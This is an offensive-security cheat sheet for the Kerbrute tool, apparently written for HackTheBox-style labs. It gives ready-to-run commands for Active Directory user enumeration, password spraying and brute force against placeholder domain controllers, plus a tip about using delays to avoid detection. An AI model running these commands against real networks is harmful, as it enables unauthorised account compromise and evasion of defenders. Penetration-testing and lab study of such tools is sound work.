🦁Kerbrute

Introduction

A tool to perform fast brute force attacks and enumerate valid Active Directory accounts through Kerberos pre-authentication.

Installation and Usage Guide

Clone the GitHub repository:

• GitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcing

Detailed guide available through the following blog:

• A Detailed Guide on Kerbrute - Hacking Articles

VERY IMPORTANT: Synchronize your system time with the Domain Controller

sudo ntpdate -s 10.10.10.10

User Enumeration

# Brute force to enumerate users
kerbrute userenum --dc 10.10.10.10 -d domain.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

Password Spraying and Brute Force

Password Spraying

# Password spraying - test one password against a list of users
kerbrute passwordspray -d domain.htb --dc dc.domain.htb users.txt 'password'

Brute Force Attacks

# Brute Force with a list of users and passwords
# Format: username:password
kerbrute bruteforce -d domain.htb --dc dc.domain.htb userspasswords.txt

# Brute Force against a single user with a password list
kerbrute bruteuser -d domain.htb --dc dc.domain.htb passwords.txt 'target_user'

Key Parameters

• --dc: Specify the Domain Controller IP address

• -d: Target domain name

• userenum: Enumerate valid usernames

• passwordspray: Test one password against multiple users

• bruteforce: Test multiple username:password combinations

• bruteuser: Test multiple passwords against one user

Tips and Best Practices

• Always synchronize time with the Domain Controller before starting

• Use comprehensive username lists for enumeration

• Be mindful of account lockout policies when performing brute force attacks

• Consider using delay options to avoid detection

• Monitor for failed authentication logs on the target system